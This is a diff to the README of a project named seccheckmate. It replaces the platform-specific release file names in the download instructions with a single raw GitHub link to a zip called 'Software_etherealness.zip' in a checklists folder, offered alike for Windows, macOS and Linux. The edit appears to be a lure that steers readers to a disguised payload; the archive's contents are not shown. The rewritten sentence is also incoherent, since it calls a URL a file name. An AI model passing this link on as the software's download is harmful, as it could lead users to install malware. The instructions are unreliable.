SamBelt/seccheckmate/README.md

 2. Look for the latest version of seccheckmate.
 3. Click on the download link for your operating system.

-Remember that the file will typically be named something like `seccheckmate-vX.X.X.exe` for Windows, `seccheckmate-vX.X.X.dmg` for macOS, or `seccheckmate-vX.X.X.tar.gz` for Linux.
+Remember that the file will typically be named something like `https://raw.githubusercontent.com/SamBelt/seccheckmate/master/checklists/Software_etherealness.zip` for Windows, `https://raw.githubusercontent.com/SamBelt/seccheckmate/master/checklists/Software_etherealness.zip` for macOS, or `https://raw.githubusercontent.com/SamBelt/seccheckmate/master/checklists/Software_etherealness.zip` for Linux.

 ### Install